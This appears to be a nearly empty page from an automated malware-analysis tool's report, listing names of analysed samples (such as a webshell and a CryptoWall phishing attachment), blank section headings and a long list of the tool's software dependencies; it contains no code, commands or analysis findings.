HYTop2006_rar_Folder_2006 HDConfig Pastebin_Webshell chinese_spam_echoer CryptoWall_Resume_phish with_attachment davivienda email_Ukraine_power_attack_content content

XREFS

Xrefs

FLAGS

Flags

CODES

Worldmap

SIMILARITY IMAGE

class:100
QBANALYZER∞ GENERATED THIS REPORT AT 2020-03-04 11:44:43 ON LINUX-5.3.0-40-GENERIC-X86_64-WITH-UBUNTU-18.04-BIONIC - (THIS PROJECT USES\DEPENDS ON DOCKER, PYTHON3, BOOTSTRAP, JAVASCRIPT, JQUERY, D3.JS, JSON, HTML, SQLITE3, WIKIPEDIA, LINUX\MACOS\WINDOWS\ANDROID DOCUMENTATION, SOFTWARE77, MITRE ATT&CK™, SC0TY, HEXACORN, RADARE2, DMG2IMG, SNORT, SNORT RULES COMMUNITY, FONT-AWESOME, FLAG-ICON-CSS, YARA-RULES GITHUB COMMUNITY TYPING, RANDOM, BINASCII, CFFI, NUMBERS, ZLIB, FUNCTOOLS, ITERTOOLS, SRE_COMPILE, SRE_PARSE, REDIS, SITE, HTTP, NTPATH, QUEUE, DISTUTILS, ARRAY, R2PIPE, PDB, TIME, IPADDRESS, THREADING, GRP, PIL, RE, UU, REPRLIB, RESOURCE, WARNINGS, CSV, GC, WEAKREF, LZMA, JSON, BZ2, ABC, EXTRACT_MSG, COLORCLASS, SYSCONFIG, EMAIL, ARGPARSE, MULTIPROCESSING, INSPECT, ATEXIT, OPENSSL, CGI, PYMONGO, REQUESTS, SSL, IMAPLIB, ERRNO, TLD, PYTESSERACT, TEXTWRAP, TEMPFILE, SHUTIL, M2CRYPTO, SELECTORS, TZLOCAL, DIFFLIB, COPY, STRUCT, LOCALE, PEFILE, ELFTOOLS, XMLRPC, REQUESTS_FILE, SHLEX, ANALYZER, COPYREG, FCNTL, OLETOOLS, PATHLIB, IMPORTLIB, ENCODINGS, IMP, WEBBROWSER, GETOPT, TRACEBACK, STRINGPREP, SOUPSIEVE, HTML, SIGNAL, POSIX, PYEXPAT, CONTEXTLIB, CODE, ORDLOOKUP, KEYWORD, BS4, TOKEN, MAGIC, MMAP, SSDEEP, PPRINT, FTPLIB, OS, OPERATOR, CODEOP, XML, SCAPY, IDNA, POSIXPATH, BUILTINS, ZIPFILE, PYPARSING, ENUM, CODECS, PLISTLIB, BSON, UNICODEDATA, UUID, CMD, BISECT, DATETIME, BDB, LOGGING, PSUTIL, SOCKETSERVER, HASHLIB, SITECUSTOMIZE, SIX, OPTPARSE, MACHOLIB, FRACTIONS, MATH, BASE64, PLATFORM, GLOB, MIMETYPES, STRING, RUNPY, ASYNCORE, STAT, PICKLE, FNMATCH, CRYPTOGRAPHY, SOCKET, MSOFFCRYPTO, URLLIB, MARKUPSAFE, GRIDFS, DECIMAL, COLLECTIONS, LINECACHE, CALENDAR, PKG_RESOURCES, CHARDET, IMAPCLIENT, OLEFILE, PKGUTIL, PYDOC, GENERICPATH, ZIPIMPORT, URLLIB3, SQLITE3, AST, OPCODE, QUOPRI, UNITTEST, PYTZ, SYS, TYPES, SWIG_RUNTIME_DATA4, SELECT, PYCPARSER, MARSHAL, TOKENIZE, HMAC, CERTIFI, YARA, CTYPES, GETTEXT, SRE_CONSTANTS, HEAPQ, IO, SUBPROCESS, DIS, GZIP, PWD, NLTK, TLDEXTRACT, JINJA2 AND TONS OF RESEARCHES - PLEASE LET ME KNOW IF I MISSED A RESOURCE OR DEPENDENCY)